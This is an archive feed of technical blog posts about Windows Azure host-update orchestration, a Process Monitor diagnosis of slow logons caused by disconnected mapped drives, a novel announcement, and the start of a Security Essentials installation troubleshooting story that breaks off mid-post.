Every Windows Azure server (also called a Physical Node or Host) hosts one or more virtual machines, called “instances”, scheduling them on physical CPU cores, assigning them dedicated RAM, and granting and controlling access to local disk and network I/O. </P> <P> The diagram below shows a simplified view of a server’s software architecture. The host partition (also called the root partition) runs the Server Core profile of Windows Server as the host OS and you can see the only difference between the diagram and a standard Hyper-V architecture diagram is the presence of the Windows Azure Fabric Controller (FC) host agent (HA) in the host partition and the Guest Agents (GA) in the guest partitions. The FC is the brain of the Windows Azure compute platform and the HA is its proxy, integrating servers into the platform so that the FC can deploy, monitor and manage the virtual machines that define Windows Azure Cloud Services. Only PaaS roles have GAs, which are the FC’s proxy for providing runtime support for and monitoring the health of the roles. </P> <P> <IMG alt="image" border="0" height="203" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5241.image_5F00_thumb_5F00_530F879B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121414iCF2A06B620962D3A" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="522" /> </P> <H3> Reasons for Host Updates </H3> <P> Ensuring that Windows Azure provides a reliable, efficient and secure platform for applications requires patching the host OS and HA with security, reliability and performance updates. As you would guess based on how often your own installations of Windows get rebooted by Windows Update, we deploy updates to the host OS approximately once per month. 
The HA consists of multiple subcomponents, such as the Network Agent (NA) that manages virtual machine VLANs and the Virtual Machine virtual disk driver that connects Virtual Machine disks to the blobs containing their data in Windows Azure Storage. We therefore update the HA and its subcomponents at different intervals, depending on when a fix or new functionality is ready. </P> <P> The steps we can take to deploy an update depend on the type of update. For example, almost all HA-related updates apply without rebooting the server. Windows OS updates, though, almost always have at least one patch, and usually several, that necessitate a reboot. We therefore have the FC “stage” a new version of the OS, which we deploy as a VHD, on each server and then the FC instructs the HAs to reboot their servers into the new image. </P> <H3> PaaS Update Orchestration </H3> <P> A key attribute of Windows Azure is its PaaS scale-out compute model. When you use one of the stateless virtual machine types in your Cloud Service, whether Web or Worker, you can easily scale the role up and down just by updating the instance count of the role in your Cloud Service’s configuration. The FC does all the work automatically to create new virtual machines when you scale out and to shut down and remove virtual machines when you scale down. </P> <P> What makes Windows Azure’s scale-out model unique, though, is the fact that it makes high availability a core part of the model. The FC defines a concept called Update Domains (UDs) that it uses to ensure a role is available throughout planned updates that cause instances to restart, whether they are updates to the role applied by the owner of the Cloud Service, like a role code update, or updates to the host that involve a server reboot, like a host OS update. The FC’s guarantee is that no planned update will cause instances from different UDs to be offline at the same time. 
A role has five UDs by default, though a Cloud Service can request up to 20 UDs in its service definition file. The figure below shows how the FC spreads the instances of a Cloud Service’s two roles across three UDs. </P> <P> <IMG alt="image" border="0" height="186" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4682.image_5F00_thumb_5F00_495B0797.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121415i496EE3B956D36F3C" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="277" /> </P> <P> Role instances can call runtime APIs to determine their UD and the portal also shows the mapping of role instances to UDs. Here’s a cloud service with two roles having two instances each, so each UD has one instance from each role: </P> <P> <IMG alt="image" border="0" height="166" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6787.image_5F00_thumb_5F00_5DAA917B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121416iDFAF202E90FE3A4A" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The behavior of the FC with respect to UDs differs for Cloud Service updates and host updates. When the update is one applied by a Cloud Service, the FC updates all the instances of each UD in turn. It moves to a subsequent UD only when all the instances of the previous have restarted and reported themselves healthy to the GA, or when the Cloud Service owner asks the FC via a service management API to move to the next UD. 
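</P> <P> As a rough illustration of the UD-by-UD walk for Cloud Service updates described above, here is a minimal Python sketch. It is not the FC’s implementation: the function names, the round-robin placement of instances into UDs, and the restart, is_healthy and manual_advance callbacks are all hypothetical stand-ins assumed only for this example. </P>
<PRE>
```python
from collections import defaultdict


def assign_update_domains(instance_names, ud_count=5):
    """Spread instances across UDs round-robin (an assumed placement policy)."""
    domains = defaultdict(list)
    for index, name in enumerate(instance_names):
        domains[index % ud_count].append(name)
    return dict(domains)


def rolling_update(domains, restart, is_healthy, manual_advance=lambda ud: False):
    """Restart one UD at a time, in UD order.

    Moves to the next UD only when every instance in the current UD reports
    healthy, or when manual_advance(ud) says the owner asked to move on.
    Returns (completed_uds, stalled_ud); stalled_ud is None on success.
    """
    completed = []
    for ud in sorted(domains):
        for name in domains[ud]:
            restart(name)  # hypothetical hook: apply the update and restart
        all_healthy = all(is_healthy(name) for name in domains[ud])
        if not all_healthy and not manual_advance(ud):
            return completed, ud  # the walk waits here in this sketch
        completed.append(ud)
    return completed, None


if __name__ == "__main__":
    names = ["web_0", "web_1", "web_2", "web_3"]
    domains = assign_update_domains(names, ud_count=2)
    restarted = []
    result = rolling_update(domains, restarted.append, lambda name: True)
    print(domains, restarted, result)
```
</PRE>
<P> In this sketch a UD that never reports healthy simply halts the walk, and the optional manual_advance callback stands in for the Cloud Service owner asking the FC to move to the next UD. 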
</P> <P> Instead of proceeding one UD at a time, the order and number of instances of a role that get rebooted concurrently during host updates can vary. That’s because the placement of instances on servers can prevent the FC from rebooting the servers on which all instances of a UD are hosted at the same time, or even in UD-order. Consider the allocation of instances to servers depicted in the diagram below. Instance 1 of Service A’s role is on server 1 and instance 2 is on server 2, whereas Service B’s instances are placed oppositely. No matter what order the FC reboots the servers, one service will have its instances restarted in an order that’s the reverse of their UDs. The allocation shown is relatively rare since the FC allocation algorithm optimizes by attempting to place instances from the same UD, regardless of what service they belong to, on the same server, but it’s a valid allocation because the FC can reboot the servers without violating the promise that it not cause instances of different UDs of the same role (of a single service) to be offline at the same time. </P> <P> <IMG alt="image" border="0" height="145" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5661.image_5F00_thumb_5F00_54185EEC.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121417i430C72E6452E6DC2" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="252" /> </P> <P> Another difference between host updates and Cloud Service updates is that when the update is to the host, the FC must ensure that one instance doesn’t indefinitely stall the forward progress of server updates across the datacenter. 
The FC therefore allots instances at most five minutes to shut down before proceeding with a reboot of the server into a new host OS and at most fifteen minutes for a role instance to report that it’s healthy from when it restarts. It takes a few minutes to reboot the host, then restart VMs, GAs and finally the role instance code, so an instance is typically offline anywhere between fifteen and thirty minutes depending on how long it and any other instances sharing the server take to shut down, as well as how long it takes to restart. More details on the expected state changes for Web and Worker roles during a host OS update can be found <A href="#" target="_blank"> here </A> . Note that for PaaS services the FC manages the OS servicing for guests as well, so a host OS update is typically followed by a corresponding guest OS update (for PaaS services that have opted into updates), which is orchestrated by UD like other cloud service updates. </P> <H3> IaaS and Host Updates </H3> <P> The preceding discussion has been in the context of PaaS roles, which automatically get the benefits of UDs as they scale out. Virtual Machines, on the other hand, are essentially single-instance roles that have no scale-out capability. An important goal of the IaaS feature release was to enable Virtual Machines to also achieve high availability in the face of host updates and hardware failures, and the Availability Sets feature does just that. You can add Virtual Machines to Availability Sets using PowerShell commands or the Windows Azure management portal. 
Here’s an example cloud service with virtual machines assigned to an availability set: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2022.image_5F00_thumb_5F00_28D3C7E5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121418i5AC91A74F1B024D6" style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="322" /> </P> <P> Just like roles, Availability Sets have five UDs by default and support up to twenty. The FC spreads instances assigned to an Availability Set across UDs, as shown in the figure below. This allows customers to deploy Virtual Machines designed for high availability, for example two Virtual Machines configured for SQL Server mirroring, to an Availability Set, which ensures that a host update will cause a reboot of only one half of the mirror at a time as described <A href="#" target="_blank"> here </A> (I don’t discuss it here, but the FC also uses a feature called Fault Domains to automatically spread instances of roles and Availability Sets across servers so that any single hardware failure in the datacenter will affect at most half the instances). 
</P> <P> <IMG alt="image" border="0" height="135" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7725.image_5F00_thumb_5F00_21B48B6D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121419i5C8757E926394253" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <H3> More Information </H3> <P> You can find more information about Update Domains, Fault Domains and Availability Sets in my Windows Azure conference sessions, recordings of which you can find on my Mark’s Webcasts page <A href="#" target="_blank"> here </A> . Windows Azure MSDN documentation describes host OS updates <A href="#" target="_blank"> here </A> and the service definition schema for Update Domains <A href="#" target="_blank"> here </A> . </P> </BODY></HTML> Thu, 27 Jun 2019 07:27:36 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/windows-azure-host-updates-why-when-and-how/ba-p/724308 MarkRussinovich 2019-06-27T07:27:36Z The Case of the Veeerrry Slow Logons https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-veeerrry-slow-logons/ba-p/724275 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 01, 2012 </STRONG> <BR /> <P> This case is my favorite kind of case, one where I use my own tools to solve a problem affecting me personally.&nbsp; The problem at the root of it is also one you might run into, especially if you travel, and demonstrates the use of some Process Monitor features that many people aren’t aware of, making it an ideal troubleshooting example to document and share. </P> <P> The story unfolds the week before last when I made a trip to Orlando to speak at Microsoft’s TechEd North America conference. 
While I was there I began to experience five-minute black-screen delays when I logged on to my laptop’s Windows 7 installation: </P> <P> <IMG alt="image" border="0" height="218" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1817.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121399iD2F91A7E39512365" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="449" /> </P> <P> I’d typically chalk up an isolated delay like this to networking issues, common at conferences and with hotel WiFi, but I hit the issue consistently when switching between the laptop’s Windows 8 installation, where I was doing testing and presentations, and the Windows 7 installation, where I have my development tools. Being locked out of your computer for that long is annoying to say the least. </P> <P> The first time I ran into the black screen I forcibly rebooted the system after a couple of minutes because I thought it had hung, but when the delay happened a second time I was forced to wait it out and face the disappointing reality that my system was sick. When I logged off and back on again without a reboot in between, though, I didn’t hit the delay. It only occurred when logging on after a reboot, which I was doing as I switched between Windows 7 and Windows 8. What made the situation especially frustrating was that whenever I rebooted I was always in a hurry to get ready for my next presentation, so had to suffer with the inconvenience for several days before I finally had the opportunity to investigate. </P> <P> Once I had a few spare moments, I launched <A href="#" target="_blank"> Sysinternals Autoruns </A> , an advanced auto-start management utility, to disable any auto-starting images that were located on network shares. 
I knew from previous executions of Autoruns on the laptop that Microsoft IT configures several scheduled tasks to execute batch files that reside on corporate network shares, so suspected that timeouts trying to launch them were to blame: </P> <P> <IMG alt="image" border="0" height="57" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4135.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121400i4E757713638A0206" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I logged off and logged back on with fingers crossed, but the delay was still there. Next, I tried logging into a local account to see if this was a machine-wide problem or one affecting just my profile. No delay. That was a positive sign since it meant that whatever the issue was, it would probably be relatively easy to fix once identified. </P> <P> My goal now was to determine what was holding up the switch to the desktop. I had to somehow get visibility into what was going on during a logon immediately following a boot. The way that immediately jumped to mind as the easiest was to use <A href="#" target="_blank"> Sysinternals Process Monitor </A> to capture a trace of the boot process. Process Monitor, a tool that monitors system-wide file system, registry, process, DLL and network operations, has the ability to capture activity from very early in the boot, stopping its capture only when the system shuts down or you run the Process Monitor user interface. 
I selected the boot logging entry from the Options menu and opened the boot logging dialog: </P> <P> <IMG alt="SNAGHTML274998d" border="0" height="213" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3073.SNAGHTML274998d_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121401i94D67F97F7303849" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTML274998d" width="377" /> </P> <P> The dialog lets you direct Process Monitor to collect profiling events, which are periodic samples of thread stacks, while it’s monitoring the boot. I enabled one-second profiling, hoping that even if I didn’t spot operations that explained the delay, I could get a clue from the stacks of the threads that were active just before or during the delay. </P> <P> After I rebooted, I logged on, waited for five minutes looking at a black screen, then finally got to my desktop, where I ran Process Monitor again and saved the boot log. Instead of scanning the several million events that had been captured, which would have been like looking for a needle in a haystack, I used this Process Monitor filter to look for operations that took more than one second, and hence might have caused the slowdown: </P> <P> <IMG alt="SNAGHTML27bf247" border="0" height="103" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2068.SNAGHTML27bf247_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121402iD08C96BD318DA951" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTML27bf247" width="454" /> </P> <P> Unfortunately, the filter cleared the display, dashing my hopes for quickly finding a clue. 
</P> <P> Wondering if perhaps the sequence of processes starting during the logon might reveal something, I opened the Process Tree dialog from the Tools menu. The dialog shows the parent-child relationships of all the processes active during a capture, which in the case of a boot trace means all the processes that executed during the boot and logon process. Focusing my attention on Winlogon.exe, the interactive logon manager, I noticed that a process named Atbroker.exe launched around the time I entered my credentials, and then Userinit.exe executed at the time my desktop finally appeared: </P> <P> <IMG alt="image" border="0" height="116" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0312.image_5F00_thumb_5F00_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121403i238F52914FDBBBE4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="444" /> </P> <P> The key to solving the mystery lay in the long pause in between. I knew that Logonui.exe simply displays the logon user interface and that Atbroker.exe is just a helper for transitioning from the logon user interface to a user session, which ruled them out, at least initially. The black screen disappeared when Userinit.exe had started, so Userinit’s parent process, Winlogon.exe, was the remaining suspect. I set a filter to include just events from Winlogon.exe and added the Relative Time column to easily see when events occurred relative to the start of the boot. 
When I looked at the resulting items I could easily see the delay was actually about six minutes, but there was no activity in that time period to point me at a cause: </P> <P> <IMG alt="image" border="0" height="266" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5621.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121404i101AC586EAC90CC8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="522" /> </P> <P> Profiling events are excluded by default, so I clicked on the profile event filter button in the toolbar to include them, hoping that they might offer some insight: </P> <P> <IMG alt="image" border="0" height="61" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1004.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121405iFD1E873458112999" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="244" /> </P> <P> In order to minimize log file sizes, Process Monitor’s profiling only captures a thread’s stack if the thread has executed since the last time it was sampled. 
I therefore was expecting to have to look at the thread profile events at the start of the event, but my eye was drawn to a pattern of the same four threads sampled every second throughout the entire black-screen period: </P> <P> <IMG alt="image" border="0" height="318" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4544.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121406iEFE281261DA361D3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="254" /> </P> <P> I was fairly certain that whatever thread was holding things up had executed some function at the beginning of the interval and was dormant throughout, so was skeptical that any of these active threads were related to the issue, but it was worth spending a few seconds to look at them. I opened the event properties dialog for one of the samples by double-clicking on it and switched to its Stack page, on the off chance that the names of the functions on the stack had an answer. 
</P> <P> When I first run Process Monitor on a system I configure it to pull symbols for Windows images from the Microsoft public symbol server using the <A href="#" target="_blank"> Debugging Tools for Windows </A> debug engine DLL, so I can see descriptive function names in the stack frames of Windows executables, rather than just file offsets: </P> <P> <IMG alt="SNAGHTML3eeaff2" border="0" height="302" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8345.SNAGHTML3eeaff2_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121407iC19A053F70921657" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTML3eeaff2" width="404" /> </P> <P> The first thread’s stack identified the thread as a core Winlogon “state machine” thread waiting for some unknown notification, yielding no clues: </P> <P> <IMG alt="image" border="0" height="320" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3566.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121408i4DED504CA751E969" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="344" /> </P> <P> The next thread’s stack was just as unenlightening, showing the thread to be a generic worker thread: </P> <P> <IMG alt="image" border="0" height="265" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4628.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121410iC776FE6FDD2D0EA5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" 
title="image" width="344" /> </P> <P> The stack of the third thread was much more interesting. It was many frames deep, including calls into functions of the Multiple UNC Provider (MUP) and Distributed File System Client (DFSC) drivers, both related to accessing file servers: </P> <P> <IMG alt="image" border="0" height="511" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3566.image_5F00_thumb_5F00_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121411iCA42E6603BAA8B72" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="344" /> </P> <P> I scrolled down to see the frames higher on the stack and the name of one of the functions, <STRONG> WLGeneric_ActivationAndNotifyStartShell_Execute </STRONG> , pretty much confirmed the thread to be the one responsible for the problem, since it implied that it was supposed to start the desktop shell: </P> <P> <IMG alt="image" border="0" height="202" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2072.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121412i007302AAB11EDEFF" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="344" /> </P> <P> The next frame’s function, <STRONG> WNetRestoreAllConnectionsW </STRONG> , combined with the deeper calls into file server functions, led me to conclude that Winlogon was trying to restore file server drive letter mappings before proceeding to launch my shell and give me access to the desktop. 
I quickly opened Explorer, recalling that I had two drives mapped to network shares hosted on computers inside the Microsoft network, one to my development system and another to the internal Sysinternals share where I publish pre-release versions of the tools. While at the conference I was not on the intranet, so Winlogon was unable to reconnect them during the logon and was eventually – after many minutes – giving up: </P> <P> <IMG alt="image" border="0" height="90" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5040.image_5F00_thumb_5F00_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121413i113CBF980B7AC7F8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> Confident I’d solved the mystery, I right-clicked on each share and disconnected it. I rebooted the laptop to verify my fix (workaround to be precise), and to my immense satisfaction, the logon proceeded to the desktop within a few seconds. The case was closed! As for why the delays were unusually long, I haven’t had the time – or need – to investigate further. The point of this story isn’t to highlight this particular issue, but to illustrate the use of the Sysinternals tools and troubleshooting techniques to solve problems. </P> <P> TechEd Europe, which took place in Amsterdam last week, gave me another chance to reprise the talks I’d given at TechEd US. I delivered the same Case of the Unexplained troubleshooting session I had at TechEd US, but this time I had the pleasure of sharing this very fresh and personal case. 
You can watch it and my other TechEd sessions either by going to my webcasts page, which lists all of my major sessions posted online, or by following these links directly: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Windows Azure Virtual Machines and Virtual Networks </A> <BR /> <A href="#" target="_blank"> Windows Azure Internals </A> <BR /> <A href="#" target="_blank"> Malware Hunting with the Sysinternals Tools </A> <BR /> <A href="#" target="_blank"> Case of the Unexplained 2012 </A> </P> </BLOCKQUOTE> <P> And you can see all of both events’ sessions online at their webcast sites: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> TechEd North America 2012 On-Demand Recordings </A> <BR /> <A href="#" target="_blank"> TechEd Europe 2012 On-Demand Recordings </A> </P> </BLOCKQUOTE> <P> I hope you enjoyed this case! </P> </BODY></HTML> Thu, 27 Jun 2019 07:26:23 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-veeerrry-slow-logons/ba-p/724275 MarkRussinovich 2019-06-27T07:26:23Z Announcing Trojan Horse, the Novel! https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/announcing-trojan-horse-the-novel/ba-p/724206 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 06, 2012 </STRONG> <BR /> <P> Many of you have read <A href="#" target="_blank"> Zero Day </A> , my first novel. It’s a cyberthriller that features Jeff Aiken and the beautiful Daryl Haugen, computer security experts who save the world from a devastating cyberattack. Its reviews and sales exceeded my expectations, so I’m especially excited about the sequel, Trojan Horse, which I think is even more timely and exciting. Trojan Horse, like Zero Day, is an action-packed cyberthriller on a global scale, pitting Jeff and Daryl against international forces in a fight for world security and their lives. Instead of telling you more, I’ll let the Trojan Horse video trailer, below, show you instead. 
</P> <P> Trojan Horse will be published on September 4, but you can preorder it now from your favorite online book seller (in the US only now, but Zero Day’s Korean publisher has already purchased foreign publishing rights). Find the ordering links, read more about Trojan Horse, see my other books, check out my book blog and find out where I’m speaking on my new website, <A href="#" target="_blank"> markrussinovich.com </A> . Preorder Trojan Horse now and tell your friends! </P> <DIV class="wlWriterSmartContent" id="scid:5737277B-5D6D-4f48-ABFC-DD9C333F4C5D:4244ffc4-869d-452f-8b29-7fcdd6644035" style="padding-bottom: 0px; padding-left: 0px; width: 425px; padding-right: 0px; display: block; float: none; margin-left: auto; margin-right: auto; padding-top: 0px"> <DIV> <EMBED height="355" src="https://www.youtube.com/v/lX1nqEPjes4&amp;hl=en" type="application/x-shockwave-flash" width="425"> </EMBED></DIV> </DIV> <BR /> </BODY></HTML> Thu, 27 Jun 2019 07:24:38 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/announcing-trojan-horse-the-novel/ba-p/724206 MarkRussinovich 2019-06-27T07:24:38Z The Case of My Mom’s Broken Microsoft Security Essentials Installation https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-my-mom-8217-s-broken-microsoft-security-essentials/ba-p/724196 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 03, 2012 </STRONG> <BR /> <P> As a reader of this blog I suspect that you, like me, are the IT support staff for your family and friends. And I bet many of you performed system maintenance duties when you visited your family and friends during the recent holidays. Every time I’m visiting my mom, I typically spend a few minutes running Sysinternals Process Explorer and Autoruns, as well as the Control Panel’s Program Uninstall page, to clean the junk that’s somehow managed to accumulate since my last visit. </P> <P> This holiday, though, I was faced with more than a regular checkup. 
My mom recently purchased a new PC, so as a result, I spent a frustrating hour removing the piles of crapware the OEM had loaded onto it (now I would recommend getting a <A href="#" target="_blank"> Microsoft Signature PC </A> , which are crapware-free). I say frustrating because of the time it took and because even otherwise simple applications were implemented as monstrosities with complex and lengthy uninstall procedures. Even the OEM’s warranty and help files were full-blown installations. Making matters worse, several of the craplets failed to uninstall successfully, either throwing error messages or leaving behind stray fragments that forced me to hunt them down and execute precision strikes. </P> <P> As my cleaning was drawing to a close, I noticed that the antimalware the OEM had put on the PC had a 1-year license, after which she’d have to pay to continue service. With excellent free antimalware solutions on the market, there’s no reason for any consumer to pay for antimalware, so I promptly uninstalled it (which of course was a multistep process that took over 20 minutes and yielded several errors). I then headed to the Internet to download what I – not surprisingly given my affiliation - consider the best free antimalware solution, <A href="#" target="_blank"> Microsoft Security Essentials (MSE) </A> . A couple of minutes later the setup program was downloaded and the installation wizard launched. 
After clicking through the first few pages it reported it was going to install MSE, but then immediately complained that an “error has prevented the Security Essentials setup wizard from completing successfully.”: </P> <P> <IMG alt="SNAGHTMLfe55b5c" border="0" height="283" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1220.SNAGHTMLfe55b5c_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121389iAB5914C07F0C1E85" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTMLfe55b5c" width="454" /> </P> <P> The suggestion to “restart your computer and try again” is intended to deal with failures caused by interference from an unfinished uninstall of existing antimalware (or a hope that whatever unexpected error condition caused the problem is transient). I’d just rebooted, so it didn’t apply. Clicking the “ <A href="#" target="_blank"> Get help on this issue </A> ” link provided some generic troubleshooting steps, like uninstalling other antimalware, ensuring that the Windows Installer service is configured and running (though by default it isn’t running on Windows 7 since it’s demand-start), and if all else fails, contacting customer support. </P> <P> I suspected that whatever I’d run into was rare enough that customer support wouldn’t be able to help (and what would they say if they knew Mark Russinovich was calling for tech support?), especially when I found no help on the web for error code 0x80070643. My brother-in-law, who is also a programmer and tech support for his neighborhood, was watching over my shoulder to pick up some tips, so the pressure was on to fix the problem. Out came my favorite troubleshooting tool, <A href="#" target="_blank"> Sysinternals Process Monitor </A> (remember, “when in doubt, run Process Monitor”). 
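</P> <P> As an aside, the error code in the dialog has some structure of its own. The sketch below is not part of the original investigation; it assumes the standard HRESULT layout (failure flag in bit 31, facility in bits 16 to 26, code in the low 16 bits), and the function name decode_hresult is purely illustrative. </P>

```python
def decode_hresult(hresult):
    """Split a 32-bit HRESULT into (failed, facility, code).

    Assumes the standard HRESULT bit layout; decode_hresult is an
    illustrative name, not a Windows API.
    """
    failed = bool((hresult >> 31) & 1)   # bit 31: 1 means failure
    facility = (hresult >> 16) & 0x7FF   # bits 16-26: originating facility
    code = hresult & 0xFFFF              # bits 0-15: facility-specific code
    return failed, facility, code


failed, facility, code = decode_hresult(0x80070643)
print(failed, facility, code)
```

<P> Facility 7 is the Win32 facility, so the low word is an ordinary Win32 error number: 1603, ERROR_INSTALL_FAILURE, the generic “fatal error during installation” result from Windows Installer. That points at the MSI layer but says nothing about the underlying cause, which is why a trace was still needed. 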
</P> <P> I reran the MSE setup while capturing a trace with Process Monitor. Then I opened Process Monitor’s process tree view to find what processes were involved in the attempted install and identified Msiexec.exe (Windows Installer) and a few launcher processes. I also saw that Setup.exe launched Wermgr.exe, the Windows Error Reporting Manager, presumably to upload an error report to Microsoft: </P> <P> <IMG alt="image" border="0" height="315" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2112.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121390i1691D6D6C91F2F3D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="224" /> </P> <P> I turned my attention back to the trace output and configured a filter that excluded everything but these processes of interest. Then I began the arduous job of working my way through tens of thousands of operations, hoping to find the needle in the haystack that revealed why the setup choked with error 0x80070643. </P> <P> As I scanned quickly to get an overall view, I noticed some writes to log files: </P> <P> <IMG alt="image" border="0" height="127" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1638.image_5F00_thumb_5F00_1D0C5AFD.png" 